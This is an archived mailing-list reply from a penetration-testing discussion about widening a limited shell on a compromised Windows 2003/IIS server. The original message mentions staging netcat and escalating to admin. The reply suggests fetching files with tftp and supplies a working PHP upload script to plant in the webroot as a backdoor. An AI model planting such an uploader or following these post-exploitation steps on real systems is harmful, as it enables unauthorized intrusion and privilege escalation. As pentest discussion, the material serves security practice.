Re: clue on shell
- From: "Robin Wood" <dninja@xxxxxxxxx>
- Date: Tue, 6 Jan 2009 09:35:26 +0000
2009/1/5 Ricardo Mourato <ricardomcm@xxxxxxxxx>:
i pentesting people, i've got a shell in a customers server, using an
webapp bug (eval() is evil()) :)
the server seems to run windows 2003 server, it's known that IIS6 "had
many security improvments", such as disabling the cmd.exe for the IIS
user, that's why i have used the old fashion "command.com" and voila,
i've got a shell, but it is very limited, i'm trying to upload some
programs, in order to get a better shell and get admin rights, btw the
server is also running plesk control panel , should i try this in a
possible way to get admin?
i know that sqlninja can upload files in debug script, i also thinked about that
i could echo "hex stuff" into %TEMP%/nc.scr for example
does anybondy knows how convert a binary in debug script?
See if tftp is on the box and use that to grab files.
If not then this php script will let you upload files, just put it in
the webroot then browse to it. It will upload the given file to
c:\temp\hacker_file.
<?php
if ($_SERVER['REQUEST_METHOD'] == "POST" && array_key_exists ("file",
$_FILES)) {
move_uploaded_file ($_FILES['file']["tmp_name"], "c:\\temp\hacker_file");
}
?>
<form method="post" action="<?=$_SERVER['PHP_SELF']?>"
enctype="multipart/form-data">
<input type="file" name="file" id="file" />
<input type="submit" name="submit" value="submit" />
</form>
Robin
- Follow-Ups:
- Re: clue on shell
- From: ArcSighter Elite
- Re: clue on shell
- From: Ricardo Mourato
- Re: clue on shell
- References:
- clue on shell
- From: Ricardo Mourato
- clue on shell
- Prev by Date: Re: Frameworks to exploit AV gw and Browser?
- Next by Date: Re: clue on shell
- Previous by thread: clue on shell
- Next by thread: Re: clue on shell
- Index(es):
Relevant Pages
|
